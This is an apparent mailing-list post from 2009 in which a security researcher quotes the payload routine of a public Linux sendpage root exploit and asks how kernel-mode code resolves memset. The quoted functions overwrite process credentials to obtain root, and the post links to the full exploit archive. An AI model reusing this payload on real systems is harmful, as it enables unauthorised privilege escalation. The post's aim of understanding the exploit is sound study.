Question about sendpage exploit

fisherman Thu, 27 Aug 2009 02:06:47 -0700

An exploit about sendpage:
http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium.tgz


I read the exploit code, having some question?
---------------------------------------------------------------------------------------
There is some code:
static void give_it_to_me_any_way_you_can(void)
{
        if (commit_creds && prepare_kernel_cred) {
                commit_creds(prepare_kernel_cred(0));
                got_root = 1;
        } else {
                unsigned int *current;
                unsigned long orig_current;
                unsigned long orig_current_4k = 0;

                if (sizeof(unsigned long) != sizeof(unsigned int))
                        orig_current = get_current_x64();
                else {
                        orig_current = orig_current_4k = get_current_4k();
                        if (orig_current == 0)
                                orig_current = get_current_8k();
                }

repeat:
                current = (unsigned int *)orig_current;
                while (((unsigned long)current < (orig_current + 0x1000 - 17 )) 
&&
                        (current[0] != our_uid || current[1] != our_uid ||
                         current[2] != our_uid || current[3] != our_uid))
                        current++;

                if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) {
                        if (orig_current == orig_current_4k) {
                                orig_current = get_current_8k();
                                goto repeat;
                        }
                        return;
                }
                got_root = 1;
                memset(current, 0, sizeof(unsigned int) * 8);
        }

        return; 
}

static int __attribute__((regparm(3))) own_the_kernel(unsigned long a,
unsigned long b, unsigned long c, unsigned long d, unsigned long e)
{
        ......
        
        // push it real good
        give_it_to_me_any_way_you_can();

        return -1;
}
-------------------------------------------------------------------------------------------

own_the_kernel() will run in kernel mode, when trigger the bug in user mode.

BUT give_it_to_me_any_way_you_can() call memset(), memset() is a
function in glic.

In Kernel mode, can Call function in glib? How to resolve the symbol?

-- 
Best Regards :-)
-------------------------------------------
Wang Yao(王耀),[email protected] [email protected]
HomePage: http://cudev.cublog.cn
Research Center of Computer Network and Information Security
Technology Harbin Institute Of Technology
Address:NO.92 West Da-Zhi Street,NanGang District,Harbin,Heilongjiang

--
To unsubscribe from this list: send an email with
"unsubscribe kernelnewbies" to [email protected]
Please read the FAQ at http://kernelnewbies.org/FAQ

Question about sendpage exploit

Reply via email to